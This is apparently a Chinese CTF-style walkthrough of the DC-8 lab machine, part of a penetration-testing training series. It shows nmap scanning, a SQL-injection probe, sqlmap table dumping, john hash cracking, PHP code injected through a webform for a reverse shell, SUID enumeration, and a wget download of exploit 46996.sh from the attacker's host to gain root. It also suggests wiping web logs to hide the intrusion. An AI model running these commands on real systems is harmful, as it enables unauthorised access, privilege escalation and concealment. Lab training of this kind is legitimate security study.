~ 精诚所至,金石为开 ~
前言
讲解了DC-8提权靶机的通关教程,比较基础,适合刚入门不久的师傅们,以及searchsploit,sqlmap ,john,nmap工具的使用,以及SUID的特性。
靶机下载,由于官网下太慢了,用夸克:
https://pan.quark.cn/s/efe0be139167
靶机复现
配置好net网卡
nmap主机探测
nmap -sP 192.168.209.0/24
端口扫描
nmap 192.168.209.139
访问80端
随便点点
注入payload,sql语句错误,存在sql注入漏洞
' and 1=1 --+
目录扫描,到 robots.txt
访问有个user/login
sqlmap的payload
sqlmap -u 'http://192.168.209.139/?nid=1' -p nid -D d7db --tables
得到两个用户的hash密码, john 暴力破解
得到第二行的密码
登录
这里有一个联系我们,提交一下看看
看到了提交成功后的内容
点击这里有个Webform
找到Form settings,并修改PHP code
但是遇到个问题,修改后,这里没有直接输出我echo的内容
直到我添加了一个标签
就正常输出了,证明了可以执行php代码,那么就可以反弹shell
打开谷歌插件,HackTools,复制反弹shell命令,当然没有的话,小羽我已经给你们准备好了
白小羽
下载链接:【渗透测试】16个实用谷歌浏览器插件分享
复制粘贴到命令执行函数中就好
攻击机开启监听
反弹四百
尝试nc
创建一个交互式终端
python -c 'import pty; pty.spawn("/bin/bash")'
查找具有SUID的文件
白小羽
SUID:当一个可执行文件被设置了SUID权限后,该文件将以文件所有者的权限而不是执行者的权限来运行。(仅执行,不包括修改)
find / -perm -4000 -print 2>/dev/null
这个命令的各个部分解释如下:
-
find /:从根目录/开始搜索。 -
-perm -4000:查找具有SUID权限的文件。SUID权限允许用户以文件所有者的权限执行该文件,而不是以用户自己的权限执行。这里的-4000表示设置用户ID位(SUID位)。 -
-print:将找到的文件路径打印到标准输出。这实际上是find命令的默认行为,所以-print可以省略。 -
2>/dev/null:将标准错误(文件描述符2)重定向到/dev/null。这意味着如果find命令在执行过程中遇到任何错误(比如权限不足无法访问某个目录),这些错误信息将不会被显示。
在Linux系统中,/sbin文件夹通常包含了一系列系统管理员使用的可执行命令,那么就可以直接利用这命令/软件,来提权
查找版本,为4.89
查找漏洞,Privilege Escalation权限提升,编号 46996.sh
搜索编号
将这个paload文件复制到 /data下面
用python开启服务器
当前文件夹没有写权限,下载不了
我们返回根目录,查看文件夹权限,发现一个其他用户具有写权限的目录
切换到/tmp目录下,下载文件
wget http://192.168.209.137:8888/46996.sh
下载成功,附加执行权限,默认没有执行权限的
查看这个46996.sh文件提示,包含了使用过程
执行提权脚本
./46996.sh -m netcat
提权成功
还感兴趣的,可以继续深入,把网站的请求日志文件内容删除,以及其他的隐蔽方式,时间比较有限,就不做讲解了,后续深入
往期推荐
DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程
DC-1综合渗透从外网打到内网,msf后渗透,权限提升,入侵痕迹清除
原文始发于微信公众号(泷羽Sec):【渗透测试】DC-8提权靶机综合渗透教程
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论